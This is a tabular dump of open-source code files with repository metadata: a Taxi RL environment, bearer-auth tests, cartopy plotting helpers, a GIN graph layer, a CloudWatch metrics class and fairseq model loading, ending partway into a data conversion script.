max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
nxapi_plumbing/__init__.py | princesethi16/nxapi-plumbing | 8 | 12764951 | from nxapi_plumbing.device import Device
from nxapi_plumbing.api_client import RPCClient, XMLClient
from nxapi_plumbing.errors import (
NXAPIError,
NXAPICommandError,
NXAPIConnectionError,
NXAPIAuthError,
NXAPIPostError,
NXAPIXMLError,
)
__version__ = "0.5.2"
__all__ = (
"Device",
"RPCClient",
"XMLClient",
"NXAPIError",
"NXAPICommandError",
"NXAPIConnectionError",
"NXAPIAuthError",
"NXAPIPostError",
"NXAPIXMLError",
)
| 1.601563 | 2 |
colosseum/mdps/taxi/taxi.py | MichelangeloConserva/Colosseum | 0 | 12764952 | <filename>colosseum/mdps/taxi/taxi.py
from abc import ABC
from copy import deepcopy
from dataclasses import asdict, dataclass
from enum import IntEnum
from colosseum.utils.random_vars import deterministic, get_dist
try:
from functools import cached_property
except:
from backports.cached_property import cached_property
from itertools import product
from typing import Any, Dict, List, Tuple, Type, Union
import numpy as np
from scipy.stats import beta, rv_continuous
from colosseum.mdps import MDP
from colosseum.mdps.base_mdp import NextStateSampler
from colosseum.utils.mdps import check_distributions
class TaxiAction(IntEnum):
    """The actions available in the Taxi MDP: four cardinal moves plus the
    passenger pick-up and drop-off actions."""
    MoveSouth = 0
    MoveNorth = 1
    MoveEast = 2
    MoveWest = 3
    PickUpPassenger = 4
    DropOffPassenger = 5
@dataclass(frozen=True)
class TaxiNode:
    """Immutable state of the Taxi MDP: taxi, passenger, and destination
    coordinates. ``XPass == -1`` encodes that the passenger is on board
    (see ``TaxiMDP._calculate_next_nodes_prms``)."""
    X: int  # taxi x coordinate
    Y: int  # taxi y coordinate
    XPass: int  # passenger x coordinate (-1 while the passenger is on board)
    YPass: int  # passenger y coordinate (-1 while the passenger is on board)
    XDest: int  # destination x coordinate
    YDest: int  # destination y coordinate
    def __str__(self):
        return f"X={self.X},Y={self.Y},XPass={self.XPass},YPass={self.YPass},XDest={self.XDest},YDest={self.YDest}"
class TaxiMDP(MDP, ABC):
    """The Taxi MDP: a taxi moves on a grid with walls, picks up a passenger
    at one of several spawn locations and delivers it to a destination.
    Successful deliveries respawn the passenger/destination pair at random
    admissible locations."""
    @staticmethod
    def testing_parameters() -> Dict[str, Tuple]:
        """Return parameter value tuples used by the test suite."""
        t_params = MDP.testing_parameters()
        t_params["size"] = (8, 10)
        t_params["length"] = (1, 2)
        t_params["width"] = (1, 2)
        t_params["space"] = (1, 2)
        t_params["n_locations"] = (4, 9)
        t_params["make_reward_stochastic"] = (True, False)
        return t_params
    @staticmethod
    def get_node_class() -> Type[TaxiNode]:
        """Return the node (state) class used by this MDP."""
        return TaxiNode
    def __init__(
        self,
        seed: int,
        size: int,
        lazy: float = None,
        randomize_actions: bool = True,
        make_reward_stochastic=False,
        length=2,
        width=1,
        space=1,
        n_locations=2 ** 2,
        optimal_mean_reward: float = 0.9,
        sub_optimal_mean_reward: float = 0.2,
        default_r: rv_continuous = None,
        successfully_delivery_r: Union[Tuple, rv_continuous] = None,
        failure_delivery_r: Union[Tuple, rv_continuous] = None,
        **kwargs,
    ):
        """
        Parameters
        ----------
        seed : int
            the seed used for sampling rewards and next states.
        randomize_actions : bool, optional
            whether the effect of the actions changes for every node. It is particularly important to set this value to
            true when doing experiments to avoid immediately reaching highly rewarding states in some MDPs by just
            selecting the same action repeatedly. By default, it is set to true.
        lazy : float
            the probability of an action not producing any effect on the MDP.
        size : int
            the size of the grid.
        make_reward_stochastic : bool, optional
            checks whether the rewards are to be made stochastic. By default, it is set to False.
        length : int, optional
            the length of the walls. By default, it is set to two.
        width : int, optional
            the width of the walls. By default, it is set to one.
        space : int, optional
            the space between walls. By default, it is set to one.
        n_locations : int, optional
            the number of locations in which the passenger and the destination can spawn. By default, it is set to four.
        optimal_mean_reward : float, optional
            if the rewards are made stochastic, this parameter controls the mean reward for the highly rewarding states.
            By default, it is set to 0.9.
        sub_optimal_mean_reward: float, optional
            if the rewards are made stochastic, this parameter controls the mean reward for the suboptimal states.
            By default, it is set to 0.2.
        default_r: Union[Tuple, rv_continuous]
            The reward distribution for moving and picking up passengers. It can be either passed as a tuple containing
            Beta parameters or as a rv_continuous object.
        successfully_delivery_r: Union[Tuple, rv_continuous]
            The reward distribution for successfully delivering a passenger. It can be either passed as a tuple
            containing Beta parameters or as a rv_continuous object.
        failure_delivery_r: Union[Tuple, rv_continuous]
            The reward distribution for failing to deliver a passenger. It can be either passed as a tuple containing
            Beta parameters or as a rv_continuous object.
        """
        # Tuples are interpreted as (distribution name, *parameters).
        if type(successfully_delivery_r) == tuple:
            successfully_delivery_r = get_dist(
                successfully_delivery_r[0], successfully_delivery_r[1:]
            )
        if type(failure_delivery_r) == tuple:
            failure_delivery_r = get_dist(failure_delivery_r[0], failure_delivery_r[1:])
        if type(default_r) == tuple:
            default_r = get_dist(default_r[0], default_r[1:])
        randomize_actions = False  # There is a bug when this is set to False. Not very important since there are many actions.
        self.sub_optimal_mean_reward = sub_optimal_mean_reward
        self.optimal_mean_reward = optimal_mean_reward
        self.n_locations = n_locations
        # Internally round n_locations up to the next perfect square so the
        # grid can be split into an integer number of quadrants per side.
        self._n_locations = int(np.ceil(n_locations ** 0.5) ** 2)
        self.space = space
        self.width = width
        self.length = length
        self.size = size
        self.make_reward_stochastic = make_reward_stochastic
        dists = [default_r, successfully_delivery_r, failure_delivery_r]
        # Custom distributions are honoured only when all three are given;
        # otherwise defaults (Beta or deterministic) are used for all.
        if dists.count(None) == 0:
            self.default_r = default_r
            self.successfully_delivery_r = successfully_delivery_r
            self.failure_delivery_r = failure_delivery_r
        else:
            if make_reward_stochastic:
                self.default_r = beta(1, 1 / sub_optimal_mean_reward - 1)
                self.successfully_delivery_r = beta(1, 1 / optimal_mean_reward - 1)
                self.failure_delivery_r = beta(1, 10 / sub_optimal_mean_reward - 1)
            else:
                self.default_r = deterministic(0.1)
                self.successfully_delivery_r = deterministic(1)
                self.failure_delivery_r = deterministic(0)
        super().__init__(
            seed=seed,
            lazy=lazy,
            randomize_actions=randomize_actions,
            size=size,
            **kwargs,
        )
    @property
    def parameters(self) -> Dict[str, Any]:
        """Return the MDP parameters, including the base-class ones."""
        return {
            **super(TaxiMDP, self).parameters,
            **dict(
                size=self.size,
                length=self.length,
                width=self.width,
                space=self.space,
                n_locations=self.n_locations,
                optimal_mean_reward=self.optimal_mean_reward,
                sub_optimal_mean_reward=self.sub_optimal_mean_reward,
                default_r=self.default_r,
                successfully_delivery_r=self.successfully_delivery_r,
                failure_delivery_r=self.failure_delivery_r,
            ),
        }
    @property
    def _quadrant_width(self):
        """Half the side length of one quadrant of the grid."""
        return self.size / int(self._n_locations ** 0.5) / 2
    @cached_property
    def _admissible_coordinate(self):
        """Build the wall layout and return the list of [x, y] coordinates
        that are NOT walls. Rows of walls (1) and corridors (0) are generated
        according to ``length``, ``width`` and ``space``."""
        rows = []
        j = 0
        while len(rows) < self.size:
            if j % 2 != 0:
                row = []
            else:
                # Offset every other wall row so walls are staggered.
                row = [0] * int((self.width + self.space) // 2)
            i = 0
            while len(row) < self.size:
                row.append(int(i % (1 + self.space) == 0))
                if row[-1] == 1:
                    # Extend the wall segment to the configured width.
                    for _ in range(self.width - 1):
                        if len(row) == self.size:
                            break
                        row.append(1)
                i += 1
            # Repeat the row `length` times, then insert an empty corridor row.
            for _ in range(self.length):
                if len(rows) == self.size:
                    break
                rows.append(row)
            if len(rows) < self.size:
                rows.append([0] * self.size)
            j += 1
        return np.vstack(np.where(np.array(rows) == 0)).T.tolist()
    @cached_property
    def _quadrants(self):
        """Partition the grid into ``_n_locations`` quadrants and return, for
        each quadrant, the admissible (non-wall) coordinates it contains."""
        quadrants = np.zeros((self.size, self.size))
        split = np.array_split(range(self.size), int(self._n_locations ** 0.5))
        for i, (x, y) in enumerate(product(split, split)):
            for q_coo_x, q_coo_y in product(x, y):
                quadrants[q_coo_x, q_coo_y] = i
        quadrants = [
            list(
                filter(
                    lambda x: x in self._admissible_coordinate,
                    np.vstack(np.where(quadrants == i)).T.tolist(),
                )
            )
            for i in range(self._n_locations)
        ]
        # Every quadrant must contain at least one admissible cell.
        assert all(len(q) != 0 for q in quadrants)
        return quadrants
    @cached_property
    def locations(self):
        """Sample one spawn location per quadrant, rejecting samples until all
        pairwise distances exceed a minimum, then return ``n_locations`` of
        them in shuffled order."""
        re_sample = True
        min_distance = max(self._quadrant_width, 2)
        while re_sample:
            locations = [
                self._quadrants[i][self._rng.randint(len(self._quadrants[i]))]
                for i in range(self._n_locations)
            ]
            re_sample = False
            nplocations = np.array(locations)
            for i in range(self._n_locations):
                for j in range(1 + i, self._n_locations):
                    diff = np.sqrt(((nplocations[i] - nplocations[j]) ** 2).sum())
                    if diff <= min_distance:
                        re_sample = True
                        break
                if re_sample:
                    break
        self._rng.shuffle(locations)
        return locations[: self.n_locations]
    @property
    def possible_starting_nodes(self) -> List[TaxiNode]:
        """Return all nodes the MDP can start from."""
        return self.starting_node_sampler.next_states
    @property
    def num_actions(self):
        """Number of available actions (see ``TaxiAction``)."""
        return len(TaxiAction)
    def _calculate_next_nodes_prms(
        self, node: TaxiNode, action: int
    ) -> Tuple[Tuple[dict, float], ...]:
        """Return the possible next-node parameter dicts with their
        probabilities for taking ``action`` in ``node``."""
        next_node_prms = asdict(node)
        if action == TaxiAction.DropOffPassenger:
            # we have the passenger and we are dropping h(er/im) in the right place
            if node.XPass == -1 and node.X == node.XDest and node.Y == node.YDest:
                next_nodes_prms = []
                # n counts the admissible (passenger, destination) respawn
                # pairs; the respawn is uniform over those pairs.
                n = 0
                for pass_loc in filter(
                    lambda loc: loc != [node.X, node.Y],
                    self.locations,
                ):
                    n += len(list(filter(lambda loc: loc != pass_loc, self.locations)))
                p = 1.0 / n
                for pass_loc in filter(
                    lambda loc: loc != [node.X, node.Y],
                    self.locations,
                ):
                    admissible_destinations = list(
                        filter(lambda loc: loc != pass_loc, self.locations)
                    )
                    for destination in admissible_destinations:
                        cur_next_node_prms: dict = deepcopy(next_node_prms)
                        (
                            cur_next_node_prms["XPass"],
                            cur_next_node_prms["YPass"],
                        ) = pass_loc
                        (
                            cur_next_node_prms["XDest"],
                            cur_next_node_prms["YDest"],
                        ) = destination
                        next_nodes_prms.append((cur_next_node_prms, p))
                return tuple(next_nodes_prms)
        if action == TaxiAction.PickUpPassenger:
            # Picking up at the passenger's cell puts it on board (-1, -1).
            if node.XPass != -1 and node.X == node.XPass and node.Y == node.YPass:
                next_node_prms["XPass"] = -1
                next_node_prms["YPass"] = -1
        if action == TaxiAction.MoveNorth:
            next_coord = [node.X, node.Y + 1]
        elif action == TaxiAction.MoveEast:
            next_coord = [node.X + 1, node.Y]
        elif action == TaxiAction.MoveSouth:
            next_coord = [node.X, node.Y - 1]
        elif action == TaxiAction.MoveWest:
            next_coord = [node.X - 1, node.Y]
        else:
            next_coord = [node.X, node.Y]
        # Moves into walls or off-grid are no-ops.
        if next_coord in self._admissible_coordinate:
            next_node_prms["X"] = next_coord[0]
            next_node_prms["Y"] = next_coord[1]
        return ((next_node_prms, 1.0),)
    def _calculate_reward_distribution(
        self,
        node: TaxiNode,
        action: IntEnum,
        next_node: TaxiNode,
    ) -> rv_continuous:
        """Return the reward distribution for the given transition."""
        if action == TaxiAction.PickUpPassenger:
            if next_node.XPass != -1 or node.XPass == -1:
                # We don't have the passenger
                return self.failure_delivery_r
        if action == TaxiAction.DropOffPassenger:
            if next_node.XPass == -1 or node.XPass != -1:
                # We didn't drop the passenger in the destination
                return self.failure_delivery_r
            elif node.XPass == -1 and next_node.XPass != -1:
                # Successful delivery: passenger was on board and respawned.
                return self.successfully_delivery_r
        return self.default_r
    def _check_input_parameters(self):
        """Validate the constructor parameters (sizes, rewards, laziness)."""
        super(TaxiMDP, self)._check_input_parameters()
        # Reward ordering must make successful delivery the best outcome.
        assert (
            self.failure_delivery_r.mean()
            < self.default_r.mean()
            < self.successfully_delivery_r.mean()
        )
        assert self.size > 3
        assert self.n_locations > (1 if self.is_episodic() else 2)
        assert self.size > self.length
        assert self.size > self.width
        assert self.size > self.space / 2
        assert self.size > 2 * self.n_locations ** 0.5
        assert self.optimal_mean_reward - 0.1 > self.sub_optimal_mean_reward
        if self.lazy:
            assert self.lazy <= 0.9
        dists = [
            self.default_r,
            self.failure_delivery_r,
            self.successfully_delivery_r,
        ]
        check_distributions(
            dists,
            self.make_reward_stochastic,
        )
    def _instantiate_starting_node_sampler(self) -> NextStateSampler:
        """Build a uniform sampler over all valid starting nodes (passenger
        and destination at distinct spawn locations, taxi anywhere admissible)."""
        starting_nodes = []
        for (
            (pass_loc_x, pass_loc_y),
            (destination_x, destination_y),
            (taxi_x, taxi_y),
        ) in product(self.locations, self.locations, self._admissible_coordinate):
            if (pass_loc_x, pass_loc_y) == (destination_x, destination_y):
                continue
            starting_nodes.append(
                TaxiNode(
                    taxi_x, taxi_y, pass_loc_x, pass_loc_y, destination_x, destination_y
                )
            )
        self._rng.shuffle(starting_nodes)
        return NextStateSampler(
            next_states=starting_nodes,
            probs=[1 / len(starting_nodes) for _ in range(len(starting_nodes))],
            seed=self._next_seed(),
        )
    def calc_grid_repr(self, node: Any) -> np.array:
        """Return a character-grid view of ``node``: 'X' walls, 'A' taxi,
        'P' passenger (when not on board), 'D' destination."""
        grid = np.zeros((self.size, self.size), dtype=str)
        grid[:, :] = "X"
        for coo_x, coo_y in self._admissible_coordinate:
            grid[coo_x, coo_y] = " "
        grid[node.XDest, node.YDest] = "D"
        if node.XPass != -1:
            grid[node.XPass, node.YPass] = "P"
        grid[node.X, node.Y] = "A"
        # Flip vertically so y grows upwards in the printed representation.
        return grid[::-1, :]
| 2.390625 | 2 |
tests/test_bearer_auth.py | neuro-inc/neuro-auth-client | 0 | 12764953 | <gh_stars>0
import pytest
from neuro_auth_client.bearer_auth import BearerAuth
class TestBearerAuth:
    """Unit tests for BearerAuth header parsing and rendering."""
    def test_decode_unexpected_scheme(self) -> None:
        """A non-Bearer scheme must be rejected."""
        header = "Basic credentials"
        with pytest.raises(ValueError, match="Unexpected authorization scheme"):
            BearerAuth.decode(header)
    @pytest.mark.parametrize("header_value", ("Bearer", "Bearer "))
    def test_decode_no_credentials(self, header_value: str) -> None:
        """A Bearer header without a token must be rejected."""
        with pytest.raises(ValueError, match="No credentials"):
            BearerAuth.decode(header_value)
    @pytest.mark.parametrize("token", ("token", "to <PASSWORD>"))
    def test_decode(self, token: str) -> None:
        """Decoding a well-formed header yields the embedded token."""
        decoded = BearerAuth.decode("Bearer " + token)
        assert decoded == BearerAuth(token=token)
    def test_encode(self) -> None:
        """Encoding renders the canonical 'Bearer <token>' form."""
        encoded = BearerAuth(token="token").encode()
        assert encoded == "Bearer token"
| 2.3125 | 2 |
attitude/display/cartopy.py | davenquinn/Attitude | 8 | 12764954 | """
Functions to plot data using the `cartopy` library.
These require the `shapely` and `cartopy` libraries to be installed.
CartoPy is sometimes difficult to install.
"""
import numpy as N
from cartopy import crs, feature
from shapely.geometry import Polygon
from ..error.axes import hyperbolic_axes
from ..stereonet import plane_errors, normal_errors
def fix_stereonet_coords(coords):
    """Negate the second column of *coords* in place and return the same array."""
    coords[:, 1] = -coords[:, 1]
    return coords
def cartopy_girdle(fit, **kw):
    """Build a cartopy ShapelyFeature for the girdle error bounds of *fit*.

    Keyword arguments are forwarded to ``hyperbolic_axes``. The upper error
    sheet forms the polygon exterior and the reversed lower sheet its hole.
    NOTE(review): assumes ``plane_errors`` returns lon/lat pairs suitable for
    ``crs.PlateCarree()`` — confirm against the stereonet module.
    """
    d = hyperbolic_axes(fit,**kw)
    cm = N.diag(d)
    # Error sheets converted from radians to degrees for both hemispheres.
    sheets = {i: N.degrees(plane_errors(fit.axes, cm, sheet=i))
              for i in ('upper','lower')}
    geom = Polygon(sheets['upper'], [sheets['lower'][::-1]])
    geometries = [geom]
    return feature.ShapelyFeature(geometries, crs.PlateCarree())
def cartopy_normal(fit, **kw):
    """Build a cartopy ShapelyFeature for the error bound around the fit's
    normal axis. Keyword arguments are forwarded to ``hyperbolic_axes``."""
    d = hyperbolic_axes(fit,**kw)
    cm = N.diag(d)
    # Normal-vector error outline, converted from radians to degrees.
    upper = N.degrees(normal_errors(fit.axes, cm))
    geom = Polygon(upper)
    geometries = [geom]
    return feature.ShapelyFeature(geometries, crs.PlateCarree())
| 3.078125 | 3 |
python/graph2tensor/model/layers/gin_layer.py | deepest-stack/graph2tensor | 0 | 12764955 | <reponame>deepest-stack/graph2tensor
#!/usr/bin/env python3
import warnings

import tensorflow as tf
class GINConv(tf.keras.layers.Layer):
    r"""
    Graph Isomorphism Network layer.
    .. math::
        h_v^{(k)} = MLP^{(k)}((1+\epsilon^{(k)}) \cdot h_v^{(k-1)}
        + aggr(\{h_u^{(k-1)},{u\in \mathcal{N}(v)}\})
    or
    .. math::
        h_v^{(k)} = MLP^{(k)}((1+\epsilon^{(k)}) \cdot h_v^{(k-1)}
        + aggr(\{w_{uv}h_u^{(k-1)},{u\in \mathcal{N}(v)}\})
    if edge weight is available
    :param init_eps: the initial epsilon value, default to 0
    :param aggr_type: how to aggregate message from neighbours, expected "max", "mean"
        or "sum", default to "max"; an unrecognized value triggers a warning and
        falls back to "max"
    :param mlp_units: `int` or `list` of integer, the units of each layer in mlp, an
        `int` value will define a 1-layer mlp, default to 32
    :param mlp_activations: `str` or `tf.keras.activations` object, or list of it, the
        activation of each layer in mlp, default to linear activation
    :param kwargs: args passed to `tf.keras.layers.Layer`
    :raises ValueError: when `mlp_units` and `mlp_activations` are lists of
        different lengths (and neither has length 1)
    """
    def __init__(self, init_eps=.0, aggr_type='max', mlp_units=32, mlp_activations=None, **kwargs):
        super(GINConv, self).__init__(**kwargs)
        self.init_eps = init_eps
        # epsilon is a single trainable scalar initialised from `init_eps`
        self.eps = self.add_weight(
            name="epsilon",
            trainable=True,
            shape=(1,),
            initializer=tf.constant_initializer(init_eps)
        )
        self.aggr_type = aggr_type
        if self.aggr_type.upper() not in ("MAX", "MEAN", "SUM"):
            # Fall back to "max" and warn. The previous `raise Warning(...)`
            # aborted construction, contradicting both the fallback assignment
            # above and the message text itself.
            self.aggr_type = "max"
            warnings.warn("Unrecognized `aggr_type`: %s, 'max' aggregation"
                          " will be applied." % (aggr_type, ))
        # Normalise units/activations to equally-long lists; a singleton on
        # either side is broadcast to match the other.
        if not isinstance(mlp_units, list):
            mlp_units = [mlp_units]
        if not isinstance(mlp_activations, list):
            mlp_activations = [mlp_activations]
        if len(mlp_units) != len(mlp_activations):
            if len(mlp_units) == 1:
                mlp_units = mlp_units * len(mlp_activations)
            elif len(mlp_activations) == 1:
                mlp_activations = mlp_activations * len(mlp_units)
            else:
                raise ValueError("`mlp_units` and `mlp_activations` should have same length")
        self.mlp_layers = [
            tf.keras.layers.Dense(units, activation=activation)
            for units, activation in zip(mlp_units, mlp_activations)
        ]
    def get_config(self):
        """Return a config dict from which the layer can be re-instantiated."""
        mlp_units, mlp_activations = [], []
        for layer in self.mlp_layers:
            config = layer.get_config()
            mlp_units.append(config["units"])
            mlp_activations.append(config["activation"])
        config = super(GINConv, self).get_config()
        config.update(
            {
                "init_eps": self.init_eps,
                # `aggr_type` was previously omitted, so `from_config`
                # round-trips silently reset the aggregation to "max".
                "aggr_type": self.aggr_type,
                "mlp_units": mlp_units,
                "mlp_activations": mlp_activations
            }
        )
        return config
    def call(self, inputs, **kwargs):
        """Aggregate neighbour features per segment, combine with the source
        node features scaled by (1 + eps), and run the result through the MLP.

        :param inputs: tuple of (src, edge_weight, dst, segment_ids)
        :param kwargs: pass ``edge_weighted=True`` to scale dst by edge_weight
        """
        src, edge_weight, dst, segment_ids = inputs
        if kwargs.get("edge_weighted", False):
            dst = dst * edge_weight
        if self.aggr_type.upper() == "MAX":
            x = tf.math.segment_max(dst, tf.squeeze(segment_ids))
        elif self.aggr_type.upper() == "MEAN":
            x = tf.math.segment_mean(dst, tf.squeeze(segment_ids))
        else:
            x = tf.math.segment_sum(dst, tf.squeeze(segment_ids))
        x = x + (1 + self.eps) * src
        for layer in self.mlp_layers:
            x = layer(x)
        return x
    def explain_call(self, inputs):
        """Like ``call`` but scales dst features by per-edge explanation
        weights before aggregation."""
        src, edge, dst, segment_ids, weights = inputs
        dst = tf.multiply(dst, tf.reshape(weights, (-1, 1)))
        return self.call((src, edge, dst, segment_ids))
if __name__ == "__main__":
    # Module is import-only; no standalone behaviour.
    pass
| 2.796875 | 3 |
src/logs/self_monitoring/sfm.py | equardo/dynatrace-aws-log-forwarder | 0 | 12764956 | # Copyright 2021 Dynatrace LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import defaultdict
from typing import Union
import boto3
class SelfMonitoringContext:
    """Accumulates self-monitoring counters for one Lambda invocation and
    pushes them to CloudWatch under the ``DT/LogsStreaming`` namespace.
    All metrics carry the function name as a dimension."""
    def __init__(self, function_name):
        # Lambda function name, attached to every metric as a dimension.
        self._function_name = function_name
        self._kinesis_records_age = []
        self._record_data_compressed_size = []
        self._record_data_decompressed_size = []
        self._log_entries_by_log_group = defaultdict(lambda: 0)
        self._log_content_len_by_log_group = defaultdict(lambda: 0)
        self._batches_prepared = 0
        self._log_entries_prepared = 0
        self._data_volume_prepared = 0
        self._batches_delivered = 0
        self._log_entries_delivered = 0
        self._data_volume_delivered = 0
        self._issue_count_by_type = defaultdict(lambda: 0)
        self._log_content_trimmed = 0
        self._log_attr_trimmed = 0
        self._logs_age_min_sec = None
        self._logs_age_avg_sec = None
        self._logs_age_max_sec = None
        self._requests_sent = 0
        self._requests_durations_ms = []
        self._requests_count_by_status_code = defaultdict(lambda: 0)
    def kinesis_record_age(self, age_sec):
        """Record the age in seconds of one Kinesis record."""
        self._kinesis_records_age.append(age_sec)
    def kinesis_record_decoded(self, record_data_compressed_size, record_data_decompressed_size):
        """Record compressed/decompressed sizes of one decoded record."""
        self._record_data_compressed_size.append(record_data_compressed_size)
        self._record_data_decompressed_size.append(record_data_decompressed_size)
    def single_record_transformed(self, log_group, log_entries_count, log_content_len):
        """Accumulate per-log-group entry and content-length counters."""
        self._log_entries_by_log_group[log_group] += log_entries_count
        self._log_content_len_by_log_group[log_group] += log_content_len
    def batch_prepared(self, log_entries_count, data_volume):
        """Count one prepared batch and its entries/volume."""
        self._batches_prepared += 1
        self._log_entries_prepared += log_entries_count
        self._data_volume_prepared += data_volume
    def batch_delivered(self, log_entries_count, data_volume):
        """Count one successfully delivered batch and its entries/volume."""
        self._batches_delivered += 1
        self._log_entries_delivered += log_entries_count
        self._data_volume_delivered += data_volume
    def issue(self, what_issue):
        """Count an issue occurrence, keyed by its type string."""
        self._issue_count_by_type[what_issue] += 1
        print("SFM: issue registered, type " + what_issue)
    def log_content_trimmed(self):
        """Count one log entry whose content was trimmed."""
        self._log_content_trimmed += 1
    def log_attr_trimmed(self):
        """Count one log attribute that was trimmed."""
        self._log_attr_trimmed += 1
    def logs_age(self, logs_age_min_sec, logs_age_avg_sec, logs_age_max_sec):
        """Record min/avg/max log age for this invocation (overwrites)."""
        self._logs_age_min_sec = logs_age_min_sec
        self._logs_age_avg_sec = logs_age_avg_sec
        self._logs_age_max_sec = logs_age_max_sec
    def request_sent(self):
        """Count one outgoing HTTP request."""
        self._requests_sent += 1
    def request_finished_with_status_code(self, status_code, duration_ms):
        """Record the status code and duration of one finished request."""
        self._requests_count_by_status_code[status_code] += 1
        self._requests_durations_ms.append(duration_ms)
    def _generate_metrics(self):
        """Convert the accumulated counters into CloudWatch metric dicts."""
        metrics = []
        common_dimensions = [{
            "Name": "function_name",
            "Value": self._function_name,
        }]
        metrics.append(_prepare_cloudwatch_metric(
            "Kinesis record age", self._kinesis_records_age, "Seconds", common_dimensions))
        metrics.append(_prepare_cloudwatch_metric(
            "Kinesis record.data compressed size", self._record_data_compressed_size, "Bytes", common_dimensions))
        metrics.append(_prepare_cloudwatch_metric(
            "Kinesis record.data decompressed size", self._record_data_decompressed_size, "Bytes", common_dimensions))
        # TO BE RESTORED IN DIFFERENT WAY IN APM-306046
        # please remove this then
        # for log_group, log_entries_count in self._log_entries_by_log_group.items():
        #     metrics.append(_prepare_cloudwatch_metric(
        #         "Log entries by LogGroup", log_entries_count, "None",
        #         common_dimensions + [{"Name": "log_group", "Value": log_group}]
        #     ))
        #
        # for log_group, log_content_len in self._log_content_len_by_log_group.items():
        #     metrics.append(_prepare_cloudwatch_metric(
        #         "Log content length by LogGroup", log_content_len, "None",
        #         common_dimensions + [{"Name": "log_group", "Value": log_group}]
        #     ))
        metrics.append(_prepare_cloudwatch_metric(
            "Batches prepared", self._batches_prepared, "None", common_dimensions))
        metrics.append(_prepare_cloudwatch_metric(
            "Log entries prepared", self._log_entries_prepared, "None", common_dimensions))
        metrics.append(_prepare_cloudwatch_metric(
            "Data volume prepared", self._data_volume_prepared, "Bytes", common_dimensions))
        metrics.append(_prepare_cloudwatch_metric(
            "Batches delivered", self._batches_delivered, "None", common_dimensions))
        metrics.append(_prepare_cloudwatch_metric(
            "Log entries delivered", self._log_entries_delivered, "None", common_dimensions))
        metrics.append(_prepare_cloudwatch_metric(
            "Data volume delivered", self._data_volume_delivered, "Bytes", common_dimensions))
        for issue, count in self._issue_count_by_type.items():
            metrics.append(_prepare_cloudwatch_metric(
                "Issues", count, "None",
                common_dimensions + [{"Name": "type", "Value": issue}]
            ))
        metrics.append(_prepare_cloudwatch_metric(
            "Log content trimmed", self._log_content_trimmed, "None", common_dimensions))
        metrics.append(_prepare_cloudwatch_metric(
            "Log attr trimmed", self._log_attr_trimmed, "None", common_dimensions))
        # Log-age metrics are only emitted when logs_age() was called.
        if self._logs_age_min_sec:
            metrics.append(_prepare_cloudwatch_metric(
                "Log age min", self._logs_age_min_sec, "Seconds", common_dimensions))
            metrics.append(_prepare_cloudwatch_metric(
                "Log age avg", self._logs_age_avg_sec, "Seconds", common_dimensions))
            metrics.append(_prepare_cloudwatch_metric(
                "Log age max", self._logs_age_max_sec, "Seconds", common_dimensions))
        metrics.append(_prepare_cloudwatch_metric(
            "Requests sent", self._requests_sent, "None", common_dimensions))
        if self._requests_durations_ms:
            metrics.append(_prepare_cloudwatch_metric(
                "Requests duration", self._requests_durations_ms, "Milliseconds", common_dimensions))
        for status_code, count in self._requests_count_by_status_code.items():
            metrics.append(_prepare_cloudwatch_metric(
                "Requests status code count", count, "None",
                common_dimensions + [{"Name": "status_code", "Value": str(status_code)}]
            ))
        return metrics
    def push_sfm_to_cloudwatch(self):
        """Send all generated metrics to CloudWatch.

        put_metric_data accepts at most 20 datums per call, hence the batching.
        On failure the metrics are printed for post-mortem and the exception
        is re-raised.
        """
        metrics = self._generate_metrics()
        cloudwatch = boto3.client('cloudwatch')
        try:
            for i in range(0, len(metrics), 20):
                metrics_batch = metrics[i:(i + 20)]
                cloudwatch.put_metric_data(MetricData=metrics_batch, Namespace='DT/LogsStreaming')
        except Exception as e:
            print("Print metrics on SFM push failure: " + str(metrics))
            raise e
def _prepare_cloudwatch_metric(metric_name, value: Union[int, float, list], unit, dimensions) -> dict:
cw_metric = {
'MetricName': metric_name,
'Dimensions': dimensions,
'Unit': unit,
}
if isinstance(value, list):
cw_metric["Values"] = value
else:
cw_metric["Value"] = value
return cw_metric
| 1.726563 | 2 |
infoxlm/src-infoxlm/infoxlm/models/__init__.py | Sanster/unilm | 5,129 | 12764957 | import argparse
import importlib
import os
from fairseq.models import MODEL_REGISTRY, ARCH_MODEL_INV_REGISTRY
# automatically import any Python files in the models/ directory; importing
# them populates the fairseq model/architecture registries as a side effect.
models_dir = os.path.dirname(__file__)
for file in os.listdir(models_dir):
    path = os.path.join(models_dir, file)
    # Skip private/hidden entries; accept both modules (.py) and packages (dirs).
    if not file.startswith('_') and not file.startswith('.') and (file.endswith('.py') or os.path.isdir(path)):
        model_name = file[:file.find('.py')] if file.endswith('.py') else file
        module = importlib.import_module('infoxlm.models.' + model_name)
        # extra `model_parser` for sphinx: expose a `<model>_parser` attribute
        # documenting the model's --arch choices and extra CLI arguments.
        if model_name in MODEL_REGISTRY:
            parser = argparse.ArgumentParser(add_help=False)
            group_archs = parser.add_argument_group('Named architectures')
            group_archs.add_argument('--arch', choices=ARCH_MODEL_INV_REGISTRY[model_name])
            group_args = parser.add_argument_group('Additional command-line arguments')
            MODEL_REGISTRY[model_name].add_args(group_args)
            globals()[model_name + '_parser'] = parser
| 2.296875 | 2 |
official/projects/unified_detector/data_conversion/convert.py | Lufeifeina/models | 1 | 12764958 | # Copyright 2022 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Script to convert HierText to TFExamples.
This script is only intended to run locally.
python3 data_preprocess/convert.py \
--gt_file=/path/to/gt.jsonl \
--img_dir=/path/to/image \
--out_file=/path/to/tfrecords/file-prefix
"""
import json
import os
import random
from absl import app
from absl import flags
